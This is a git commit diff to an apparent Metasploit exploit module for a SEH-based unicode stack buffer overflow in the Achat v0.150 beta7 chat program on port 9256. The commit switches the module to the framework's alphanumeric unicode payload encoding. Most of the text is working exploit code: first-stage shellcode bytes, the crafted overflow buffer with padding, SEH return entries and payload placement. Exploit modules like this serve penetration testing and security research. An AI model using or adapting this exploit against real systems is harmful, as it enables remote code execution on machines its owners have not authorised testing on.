proper payload encoding from now on

2015-02-09 23:36:35 +01:00 · 2015-02-09 23:36:35 +01:00 · ac6879cfe1
parent c7880ab4e1
commit ac6879cfe1
1 changed files with 5 additions and 6 deletions
--- a/modules/exploits/windows/misc/achat_beta.rb
+++ b/modules/exploits/windows/misc/achat_beta.rb
@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
-      'Name'           => 'Achat Beta v0.150 Buffer Overflow',
+      'Name'           => 'Achat v0.150 beta7 Buffer Overflow',
      'Description'    => %q{
         This module exploits a SEH based unicode stack buffer overflow in Achat v0.150,
         by sending a crafted message to the default harcoded port 9256. The message
@ -38,9 +38,11 @@ class Metasploit3 < Msf::Exploit::Remote
        },
      'Payload'        =>
        {
+          'DisableNops' => true,
          'Space'    => 730,
-#          'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
+          'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
          'StackAdjustment' => -3500,
+          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'EncoderOptions'  =>
            {
              'BufferRegister' => 'EAX',
@ -84,9 +86,6 @@ class Metasploit3 < Msf::Exploit::Remote
    # 59               POP ECX                  # padding
    # 0039             ADD BYTE PTR DS:[ECX],BH # padding
    firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
-    encoder = framework.encoders.create('x86/unicode_mixed')
-    encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
-    payloadencoded = encoder.encode(payload.raw, nil, nil, platform)

    sploit = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
    sploit << "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
@ -117,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote
    sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
    sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
    sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX
-    sploit << payloadencoded + "A"*(1152-payloadencoded.length) # placing the payload
+    sploit << payload.encoded + "A"*(1152-payload.encoded.length) # placing the payload
    sploit << "\x00" + "A"*10 + "\x00"